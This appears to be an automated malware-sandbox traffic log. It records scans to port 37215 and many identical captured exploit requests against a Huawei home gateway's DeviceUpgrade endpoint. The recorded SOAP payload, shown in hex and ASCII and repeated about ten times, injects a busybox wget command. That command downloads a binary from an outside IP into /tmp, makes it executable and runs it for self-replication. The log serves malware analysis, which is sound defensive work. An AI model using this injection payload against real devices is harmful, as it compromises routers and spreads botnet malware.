          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.87.173.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 173.231.242.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.128.53.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.254.103.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.144.125.224:37215
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 